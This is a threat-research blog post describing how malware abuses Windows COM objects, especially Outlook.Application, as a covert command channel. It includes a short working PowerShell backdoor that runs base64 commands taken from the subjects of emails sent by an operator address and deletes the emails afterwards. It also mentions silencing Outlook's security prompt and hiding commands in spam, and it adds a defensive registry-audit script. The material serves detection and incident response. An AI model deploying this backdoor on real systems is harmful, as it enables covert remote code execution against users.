Malware and COM Object – The paradise of covert channels

Windows COM object & common usage by malware developers

COM (Component Object Model) is a technology developed by Microsoft for Windows systems. Its purpose is to let one application control another as if it were an object, so the technology can also be considered an inter-process communication channel.

This technology is well known to malware developers. For example, in August 2014 I wrote an article on VirusBulletin about IcoScript [1]. It is a RAT (Remote Administration Tool) that uses a COM object to drive Internet Explorer. This choice brings the malware developers several advantages:

  • It is stealthy: only two APIs are used, CoInitialize() and CoCreateInstance();
  • Internet Explorer’s configuration is transparently reused (proxy configuration, …);
  • It is easy to code.

Today, the Internet Explorer COM object is commonly used by malware developers, and the experts of Sekoia’s CERT frequently run into this approach during malware analysis.

Uncommon usage: Outlook instrumentation

Microsoft provides many other interesting COM objects that malware developers could use to communicate with their C&C. Basically, two applications are always connected to the Internet on a user’s computer:

  • The browser (discussed in the previous part);

  • The email client.

Microsoft Office Outlook is widely used in professional environments. Naturally, Microsoft provides a COM object to manipulate an “Outlook object”; its name is “Outlook.Application”. Among other things, this object allows a developer:

  • To manipulate emails: read, write, remove…

  • To generate events: client starting, client closing, new email…

Thanks to these features, a malware developer could design the following communication channel:

  • Step 1: the malware is waiting for a new incoming email;

  • Step 2: the malware checks the identity of the sender;

  • Step 3: if the identity is the malware operator’s, the content of the subject is decoded and executed;

  • Step 4: the email is removed and the process goes back to step 1.

The complete implementation takes fewer than 20 lines of PowerShell:

$action = {
  # Runs on each NewMailEx event: walk the Inbox looking for unread mails
  $outlook = new-object -com outlook.application;
  $ns = $outlook.GetNameSpace("MAPI");
  $inbox = $ns.GetDefaultFolder(6);   # 6 = olFolderInbox
  $inbox.items | foreach {
    if($_.unread -eq $True) {
      # Step 2: only the operator's sender address is accepted
      if ($_.SenderEmailAddress.equals("supervilain@vilain.fr")) {
        # Step 3: the subject carries the base64-encoded command
        $command = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($_.Subject))
        $job = { Invoke-Expression -Command $args[0] }
        Start-Job -Name ex -ScriptBlock $job -ArgumentList $command
        $_.Delete()   # Step 4: the email is removed
      }
    }
  }
}
# Step 1: subscribe to Outlook's NewMailEx event so $action fires on every new mail
$ol = new-object -com outlook.application;
$null = Register-ObjectEvent $ol NewMailEx -SourceIdentifier MyAlert -Action $action;

The code is easy to understand. The following video shows the behavior on the infected system when the subject is “Y21kLmV4ZSAvQyBjYWxjLmV4ZQ==” (cmd.exe /C calc.exe):

By default, Microsoft Office Outlook does not allow this external interaction and shows a popup to the user. Sadly, the notification can easily be switched off by modifying a few registry keys [2].
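As an added defender-side check (not code from the original post), the following PowerShell function reports the Outlook ObjectModelGuard value, the setting behind the popup described above, so an analyst can spot a machine where the prompt has been silenced. It assumes the documented meanings of ObjectModelGuard (0 = warn when antivirus is inactive or out of date, the default; 1 = always warn; 2 = never warn) and the Office version and Group Policy key paths listed in the code.

```powershell
# Added example, not part of the original post: audit the Outlook
# "programmatic access" prompt setting (ObjectModelGuard DWORD).
# Assumptions: value meanings as documented by Microsoft, and the
# Office version keys / policy paths listed below (adjust as needed).
function Get-OutlookProgrammaticAccessGuard {
    param([string[]]$OfficeVersions = @('14.0', '15.0', '16.0'))

    $meaning = @{
        0 = 'warn when antivirus is inactive or out of date (default)'
        1 = 'always warn'
        2 = 'never warn: prompt suppressed, COM automation runs silently'
    }

    foreach ($v in $OfficeVersions) {
        # Trust Center setting (HKCU) and the Group Policy override (Policies)
        $paths = @(
            "HKCU:\Software\Microsoft\Office\$v\Outlook\Security",
            "HKCU:\Software\Policies\Microsoft\Office\$v\Outlook\Security"
        )
        foreach ($p in $paths) {
            if (-not (Test-Path $p)) { continue }
            $item = Get-ItemProperty -Path $p -Name ObjectModelGuard -ErrorAction SilentlyContinue
            if ($null -eq $item) { continue }   # key exists, value unset: default applies
            $guard = [int]$item.ObjectModelGuard
            $desc = 'unexpected value'
            if ($meaning.ContainsKey($guard)) { $desc = $meaning[$guard] }
            [pscustomobject]@{
                Version = $v
                Path    = $p
                Value   = $guard
                Meaning = $desc
                Alert   = ($guard -eq 2)
            }
        }
    }
}

# Report. A row with Alert = True deserves a look at who changed the value
# (compare with registry-modification telemetry from Security logs or EDR).
$findings = Get-OutlookProgrammaticAccessGuard
if (-not $findings) {
    'No explicit ObjectModelGuard value found: Outlook default (warn) applies.'
} else {
    $findings | Format-Table Version, Value, Alert, Path -AutoSize
}
```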

To make this design more effective, the operator could hide the command in a message that looks like spam, since everybody receives spam daily without paying attention to it…

Conclusion

COM objects are powerful and very convenient for developers. However, this power can also be used by bad actors. The experts of Sekoia’s CERT know that malware already instruments Office Outlook, and they use this knowledge to add monitoring and logging on email servers in order to ease digital investigation during incident response.

[1] https://www.virusbtn.com/virusbulletin/archive/2014/08/vb201408-IcoScript

[2] http://www.slipstick.com/developer/change-programmatic-access-options/

Paul Rascagneres

Senior threat researcher, malware analyst and IT conf speaker…
